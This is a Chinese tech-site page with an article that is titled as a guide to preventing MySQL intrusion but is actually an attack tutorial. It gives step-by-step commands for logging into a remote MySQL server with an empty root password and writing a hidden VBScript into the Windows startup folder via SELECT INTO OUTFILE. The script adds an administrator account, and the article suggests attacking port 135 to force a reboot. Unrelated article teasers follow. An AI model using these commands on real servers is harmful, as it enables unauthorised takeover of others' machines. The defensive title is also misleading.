My SQL防入侵方法大全_MySQL-mysql教程-PHP中文網

首頁

資料庫

mysql教程

My SQL防入侵方法大全_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 02:00 PM

辦法使用者

MYSQL用户ROOT密码为空时是一个很大的漏洞，在网上也有许多一些利用此漏洞的方法，一般就是写一个ASP或PHP的后门，不仅很麻烦，而且还要猜解网站的目录，如果对方没有开IIS，那我们岂不没办法了？？

后来，自己思索想到一个办法，且在测试的几台有此漏洞的机中均获得了成功，现将攻击方法公布如下：

1、连接到对方MYSQL 服务器

mysql -u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中

2、让我们来看看服务器中有些什么数据库

mysql>show databases;

MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test;

我们将会进入test数据库中

4、查看我们进入数据库中有些什么数据表

mysql>show tables;

默认的情况下，test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表；

mysql>create table a (cmd text);

好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

6、在表中插入内容

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " ); mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );

注意双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

7、好了，现在我们来看看表a中有些什么

mysql>select * from a;

我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步

8、输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c:////docume~1////alluse~1////「开始」菜单////程序////启动////a.vbs";

我们把我们表中的内容输入到启动组中，是一个VBS的脚本文件！注意“//"符号。

9、看到这大家肯定知道了，就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢，因为启动运行时会有明显的DOS窗口出来，而用VBS脚本则可以完全隐藏窗口且不会有错误提示！本来，应该还有一句完成脚本后自动删除此脚本的，但是中文目录实在无法处理，只有作罢！好了，找个工具攻击135让服务器重启吧，几分钟以后你就是管理员了。

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

Windows 11 上缺少本地用户和组：如何添加它Sep 22, 2023 am 08:41 AM

“本地用户和组”实用程序内置于“计算机管理”中，可以从控制台访问，也可以独立访问。但是，一些用户发现Windows11中缺少本地用户和组。对于可以访问它的一些人来说，该消息显示，此管理单元可能不适用于此版本的Windows10。若要管理此计算机的用户帐户，请使用“控制面板”中的“用户帐户”工具。该问题已在上一次迭代Windows10中报告，并且通常是由于用户端的问题或疏忽引起的。为什么Windows11中缺少本地用户和组？您运行的是Windows家庭版，本地用户和组在专业版及更高版本上可用。活动

探索Windows 11指南：如何访问旧硬盘驱动器上的用户文件夹Sep 27, 2023 am 10:17 AM

由于权限，并不总是可以访问某些文件夹，在今天的指南中，我们将向您展示如何在Windows11上的旧硬盘驱动器上访问用户文件夹。此过程很简单，但可能需要一段时间，有时甚至数小时，具体取决于驱动器的大小，因此请格外耐心并严格按照本指南中的说明进行操作。为什么我无法访问旧硬盘上的用户文件夹？用户文件夹的所有权属于另一台电脑，因此您无法对其进行修改。除了所有权之外，您对该文件夹没有任何权限。如何打开旧硬盘上的用户文件？1.取得文件夹的所有权并更改权限找到旧的用户目录，右键单击它，然后选择属性。导航到“安

Windows 11 KB5031455无法安装，导致某些用户出现其他问题Nov 01, 2023 am 08:17 AM

Microsoft开始推出作为Windows503145511H22或更高版本的可选更新向公众KB2。这是第一个默认启用Windows11Moment4功能的更新，包括受支持区域中的WindowsCopilot、对“开始”菜单中项目的预览支持、任务栏的取消分组等。此外，它还修复了Windows11的几个错误，包括导致内存泄漏的潜在性能问题。但具有讽刺意味的是，2023年<>月的可选更新对于尝试安装更新的用户甚至已经安装更新的用户来说都是一场灾难。许多用户不会安装此Wi

Win11 新版画图：一键移除背景实现抠图功能Sep 15, 2023 pm 10:53 PM

微软邀请Canary和Dev频道的WindowsInsider项目成员，测试和体验新版画图（Paint）应用，最新版本号为11.2306.30.0。本次版本更新最值得关注的新功能是一键抠图功能，用户只需要点击一下，就能自动消除背景，凸显画面主体，便于用户后续操作。整个步骤非常简单，用户在新版画图应用中导入图片，然后点击工具栏上“移除背景”（removebackground）按钮，就可以删除图片中的背景，用户也可以使用矩形来选择要消除背景的区域。

TranslucentTB不起作用：如何解决Jun 06, 2023 am 08:21 AM

TranslucentTB是寻求时尚简约桌面外观的Windows11爱好者广泛使用的工具，遇到了障碍。自从发布以来Windows11内部版本22621.1344（22H2）28年2023月日，TranslucentTB对大多数用户不起作用。此错误使用户努力应对其任务栏的有限自定义选项。用户在寻求克服这一挫折的解决方案时，挫败感显而易见。在最近的Windows11更新之后，TranslucentTB无法正常工作的问题已在多个在线平台上广泛报道，包括论坛和社交媒体。用户一直在分享他们的经验，拼命寻找

mysql 怎么修改hostFeb 15, 2023 am 10:17 AM

mysql修改host的方法：1、通过“sudo service mysql stop”停掉mysql服务；2、以安全模式启动mysql，然后重置root密码；3、通过“update user set Host='%' where User='hive';”语句修改host即可。

笔记本电脑无法关机该怎么解决Feb 25, 2024 am 09:24 AM

为什么笔记本电脑关不了机怎么办随着科技的不断发展，笔记本电脑已经成为了人们生活中不可或缺的一部分。然而，有时我们可能会遇到一个令人沮丧的问题，那就是笔记本电脑无法关机。面对这个问题，我们该如何解决呢？本文将探讨关不了机的原因以及应对方法。首先，让我们来看看为什么笔记本电脑会出现关不了机的情况。有时候，这个问题可能是由于系统中的某些错误引起的。例如，可能是因为

如何下载iPhone地图以供离线使用Nov 04, 2023 pm 11:13 PM

随着iOS17的推出，Apple使iPhone用户可以下载地图以供离线使用。此功能为可能前往互联网连接不可靠或不存在的地区的用户提供了实用的解决方案。通过将地图下载到他们的设备上，用户可以确保即使失去蜂窝连接，他们也可以始终访问他们想要的路线。离线地图不仅仅是一个位置的静态图像。它们为用户提供了丰富的信息，例如地点的小时数和评级、转弯路线和预计到达时间。这意味着即使没有Wi-Fi或蜂窝连接，用户仍然可以导航和访问有关周围环境的关键信息。在“地图”中使用搜索功能打开“地图”应用，在搜索中搜索某个地

See all articles